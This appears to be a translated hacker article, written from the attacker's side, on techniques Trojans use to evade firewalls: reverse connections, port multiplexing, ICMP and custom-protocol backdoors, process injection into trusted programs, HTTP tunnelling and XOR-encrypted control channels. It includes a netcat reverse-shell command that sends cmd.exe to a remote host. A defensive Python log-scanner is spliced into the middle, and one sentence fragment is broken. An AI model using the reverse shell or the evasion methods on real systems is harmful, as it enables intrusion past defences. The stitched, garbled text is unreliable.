Principle of Trojan wall-mounting

Source: Internet
Author: User

When the network is not a peaceful place, people set up firewalls to defend against network attacks. Isn't that a huge challenge to the survival of our Trojans?

Survival of the fittest, well... to survive, we have to get through the wall! Bypassing the firewall:

1. No firewall at all (the host can listen on basically any port for external connections). No firewall? Isn't that nonsense?

Such a machine is easy to deal with: basically any horse will do. A typical representative is Radmin (strictly speaking it is not a Trojan; once enough people use it as one, it becomes one. It is innocent.)

RDP, 3389/tcp (Remote Desktop; not a Trojan either, but if you don't need it, who else would be using it?)

2. Port filtering (only external connections to specific ports are allowed: an external SYN to an allowed port completes the three-way handshake and the connection is established; otherwise the firewall drops the packet, the handshake never completes and no connection forms. In other words, a Trojan cannot simply open a port and listen for incoming connections.)

Where the defence rises a foot, the attack rises ten:

If you won't let me connect to you, I will make you connect to me. Thus bounce-port (reverse connection) technology was born (firewalls generally do not block locally initiated SYN requests).

Use the tool netcat (http://www.heibai.net/download/Soft/Soft_5972.htm) to punch through this kind of firewall:

    nc -e cmd.exe <remote ip> <remote listening port>

Later came port multiplexing, which reuses ports the firewall already allows, such as 80, 21 and 445.

Typical backdoors: hkdoor and ntrootkit (author: yyt_hac).

There is also communication over portless protocols, such as ICMP packets (Ping uses the ICMP Echo Request and Echo Reply to detect whether a host is alive).

Typical example: pingdoor. Because it uses the same ICMP packets as Ping, port filtering is helpless (no port is opened at all). But ICMP has no error control, so the transmission characteristics of such backdoors are poor unless you add error control yourself.

Going further, one can simply put TCP/IP aside and have the Trojan speak its own custom protocol for communication. What can your firewall do about me then? Haha.

For example, ntrootkit adopts the custom protocol technique.

3. Application filtering (only specific programs are allowed to access the network).

Trojans cannot afford to fall behind: if they cannot access the network themselves, they have to find another way to get their messages out:

Thus process injection was born. Firewalls generally allow iexplore.exe, e.e.exe, svchost.exe, services.exe and similar programs to access the network, so the Trojan sets its sights on these programs: inject, inject, and inject again.

in progress) and Gray Pigeon/pc (embedded in the iexplore.exe browser process).

4. Protocol filtering.

(For example, only the HTTP protocol is allowed through port 80, so a backdoor that multiplexes port 80 without speaking HTTP is unfortunately rejected by the firewall :-)

What to do? Take the hidden road through Chen Cang and dig a tunnel: an HTTP tunnel encapsulates the Trojan's communication in HTTP datagrams for transmission.

PcShare uses this (two-way HTTP tunnel transmission).
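The three evasion classes described above, port multiplexing (section 2), ICMP tunnels such as pingdoor (section 2) and injection into whitelisted processes (section 3), each leave a mismatch in egress logs that a firewall or host agent can look for. This added example (not code from the article) scores constructed log lines against those mismatches; the key=value log format, the whitelist and the ICMP payload threshold are assumptions.

```python
import re

# Constructed sample lines in a made-up key=value egress-log format.
SAMPLE_LOG = """\
proc=iexplore.exe proto=tcp dport=80 app=http bytes=5120
proc=svchost.exe proto=tcp dport=4444 app=unknown bytes=310
proc=services.exe proto=tcp dport=80 app=unknown bytes=2048
proc=update.exe proto=tcp dport=443 app=tls bytes=900
proc=SYSTEM proto=icmp dport=- app=echo bytes=64
proc=SYSTEM proto=icmp dport=- app=echo bytes=1400
proc=SYSTEM proto=icmp dport=- app=echo bytes=1400
"""

# Processes the article says application filtering typically whitelists.
TRUSTED = {"iexplore.exe", "svchost.exe", "services.exe"}
# Port -> application protocol a protocol-filtering firewall expects on it.
EXPECTED_APP = {80: "http", 443: "tls", 21: "ftp", 445: "smb"}
# Assumed threshold: a normal echo request carries 32-64 bytes of payload.
ICMP_MAX_PAYLOAD = 128
FIELD = re.compile(r"(\w+)=(\S+)")

def parse(line):
    rec = dict(FIELD.findall(line))
    rec["dport"] = int(rec["dport"]) if rec["dport"].isdigit() else None
    rec["bytes"] = int(rec["bytes"])
    return rec

def classify(rec):
    """Name the evasion class a record resembles, or None if it looks benign."""
    if rec["proto"] == "icmp":
        # pingdoor-style tunnel: echo payload far larger than a real ping.
        return "icmp-tunnel" if rec["bytes"] > ICMP_MAX_PAYLOAD else None
    expected = EXPECTED_APP.get(rec["dport"])
    if expected and rec["app"] != expected:
        # Port multiplexing: an allowed port carrying a protocol it is not open for.
        return "port-reuse"
    if rec["proc"] in TRUSTED and not expected:
        # Process injection: a whitelisted binary reaching an unexpected port.
        return "process-injection"
    return None

def scan(log):
    """Return (process, dport, class) for every suspicious line in the log."""
    hits = []
    for line in log.splitlines():
        rec = parse(line)
        cls = classify(rec)
        if cls:
            hits.append((rec["proc"], rec["dport"], cls))
    return hits
```

Plain XOR traffic (section 6) defeats a payload signature but not these checks, which look only at process, port and size.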

5. IP address filtering, generally divided into three zones: the local computer, the LAN and the WAN. But Trojans are not to be trifled with, and some have begun to get smart:

For example, if the Trojan cannot connect to the hacker's host or a stepping stone, it looks up the local machine's proxy settings, such as the IE proxy settings, and goes out through that proxy!

It is easy to imagine that P2P Trojans will soon become possible, making the gap between Trojans and botnets even smaller.

6. Nowadays many firewalls can detect sensitive information in transit, such as user passwords. So anti-IDS and resistance to automatic analysis are things an advanced Trojan must consider; in other words, protecting the security and privacy of the hacker's control channel. The typical solution is encryption; the simplest way to deal with IDS detection is XOR encryption.

Of course, today's firewalls do not apply the above techniques in isolation; they use several of them at the same time.

And likewise, Trojans that combine the above countermeasures are by no means rare.
